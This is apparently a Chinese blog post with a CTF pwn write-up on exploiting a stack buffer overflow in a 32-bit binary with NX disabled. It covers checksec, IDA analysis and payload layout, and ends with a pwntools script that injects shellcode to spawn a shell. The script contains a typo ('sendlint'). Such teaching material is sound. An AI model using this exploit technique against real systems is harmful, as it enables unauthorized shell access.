PWN简单栈溢出漏洞获取shell

最新推荐文章于 2024-08-23 17:36:53 发布
最新推荐文章于 2024-08-23 17:36:53 发布
阅读量2.8k 收藏 23
点赞数
分类专栏: PWN 文章标签: pwn shellcode 栈溢出 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/99448309
版权

PWN简单栈溢出漏洞获取shell

题目来源
下载链接(密码akcz)
CTF的时候需要的是获取系统shell,然后通过shell去拿到flag。
条件所限,那我们就先将程序放本地。也就是本地机也充当远程服务器角色

1. 运行程序、查看文件类型、保护措施

程序输出一段应该是内存地址的16位字符串;接着要求我们输入,之后就结束运行程序。

程序为32位动态链接的ELF文件

可以看到NX保护关了,如果开启则我们的shellcode无法运行;checksec各种保护措施

2.反汇编分析

将程序拉到IDA分析;打开main(),按F5显示对应伪C代码;


并没有有用信息,接着打开foo()函数

函数体内首先定义一个字符变量buf;然后输出buf在内存的地址;接着调用read函数向buf写入字符后返回。

数据的写入是从低位向高位写的。如果超过这个变量原定空间,继续向高位写,也就造成溢出。

定义的buf变量只有1字节内存空间,但是read()从变量处写入0x100u字节,也就是造成溢出了。

结合本题需要获取shell,而且NX关闭,也就是可以控制函数返回地址eip跳转到shellcode的内存地址。(shellcode简单点理解就是运行了就获得了shell的对话窗口)

3. 调试分析payload

已知条件和目标:

  • buf内存地址
  • eip覆盖为shellcode内存地址
  • 注入shellcode代码

shellcode注入位置自主选择,方便就选择在eip的下一个内存单元中。


结合IDA对栈空间的分析,payload的基本结构就清晰了:

payload = buf内存地址 + (ebp) + shellcode内存地址(eip) + shellcode代码

4. 编写payload利用脚本

# -*- coding: utf-8 -*-
from pwn import *

context(os='linux',arch='i386',log_level='debug')

#载入程序
pwn = process('./pwn2')
#链接远程服务器使用下面这条(也就是题目在服务器上)
#pwn = remote([ip],[port])

#获取buf内存地址;去除末尾换行符,并转换为数字类型
bufAddr = int(pwn.recvline()[:-1],16)

#生成shellcode。并转换为机器码
shell = asm(shellcraft.i386.linux.sh())

#计算shellcode内存地址
shellAddr = bufAddr + 0x1c + 0x4 + 0x4

payload = 'A'*0x1c + 'A'*0x4 + p32(shellAddr) + shell

pwn.sendlint(payload)
#将程序控制权交给用户,相当于自用运行
pwn.interactive()

5. 总结

  • checksec各种保护措施

  • 通过asm(shellcraft.i386.linux.sh())生成转换shellcode

  • read()函数的第三个参数为写入的字节大小,注意查看变量能否容纳下,否则造成溢出

SkYe231_
关注
专栏目录
栈溢出基础——ROP1.0的例题
07-13
在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为“ROP1.0”的例子来进一步理解这一...
linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客
weixin_39611389的博客
05-16 949
摘要本文讲述的是PWN利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介。0x01 前言经过前面的几篇文章我们大概以及了解了基本的栈溢出漏洞利用方式,那今天就来个进阶版。有时候我们在打CTF的时候需要的是获取系统shell,然后通过shell去拿到flag,那么我们该怎么通过溢出漏洞来拿到服务器...
PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 4497
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
pwn-shellcode执行
最新发布
GalaxySpaceX的博客
08-23 1091
pwn-shellcode执行
shellcode基本知识(PWN
weixin_51758733的博客
07-15 969
shellcode基本知识(PWN
[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)
2301_79326813的博客
04-27 702
查看保护查看ida这里有一次栈溢出,并且题目给了我们system函数。这里的知识点没有那么复杂。
攻防世界PWNshell题解
seaaseesa的博客
11-22 1493
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
带exp的pwn测试文件
09-12
1. **ret2text**:这种技术利用了程序中的缓冲区溢出漏洞,使得攻击者可以改变返回地址,使其指向内存中的可执行文本段。这样,当函数返回时,程序将执行攻击者指定的代码。 2. **ret2syscall**:与ret2text类似,...
pwn100题目文件及exp.zip
08-09
本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)竞赛题目,旨在帮助学习者了解和实践栈溢出漏洞利用技巧。 栈溢出是由于程序在分配的栈空间之外写入数据,导致栈上的其他变量或返回地址被覆盖...
pwn入门题目汇总.rar
09-01
了解这些内存区域的特性对于发现和利用缓冲区溢出漏洞至关重要。 缓冲区溢出是pwn中最常见的漏洞类型,它发生在程序试图向固定大小的缓冲区内写入超出其容量的数据时。这可能导致数据覆盖相邻内存区域,如返回地址...
安恒杯pwn1
04-25
该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示了三个函数的入口地址。通过使用IDA查看这三个函数,发现...
攻防世界-PWN-shell
aptx4869_li的博客
05-29 383
攻防世界-PWN-shell 检查保护机制 healer@healer-virtual-machine:~/Desktop/shell$ checksec shell [*] '/home/healer/Desktop/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x4000
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2199
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
栈溢出从入门到提高 (转载)
x_zj的专栏
04-13 1562
栈溢出从入门到提高 -------------------------------------------------------------------------------- 整理:阿新     有一些是在以前的文章里照搬的,希望作者不要介意 :P堆栈溢出系列讲座 入门篇 本讲的预备知识: 首先你应该了解intel汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配
栈溢出原理与 shellcode 开发
weixin_30902675的博客
04-03 249
ESP:该指针永远指向系统栈最上面一个栈帧的栈顶EBP:该指针永远指向系统栈最上面一个栈帧的底部01 修改函数返回地址#include<stdio.h>#include<string.h>#define PASSWORD "1234567"int verify_password (char *password){ int authenticated; char buf...
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 1246
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
攻防世界(pwn) shell——c代码审计题
PLpa的博客
04-19 1014
前言: 此题难度没有前几题或者后几题难度大,考验的是对c程序逻辑的理解。 开了canary和NX保护,我们打首先运行一下程序查看程序的逻辑。 程序打开了一个shell,但是只能运行ls指令,不能运行cat指令,这样我们就不能查看远端的信息了。 我们打开IDA看看程序的逻辑。 通过IDA的提示,我们知道,程序还可以运行login指令,他是一个登录程序,登录成功后就可以获取权限。 我们继续往下看...
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 4372
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
pwn+栈溢出解题思路
11-10
栈溢出是一种常见的漏洞,攻击者可以通过利用栈溢出漏洞来执行恶意代码。pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如栈随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值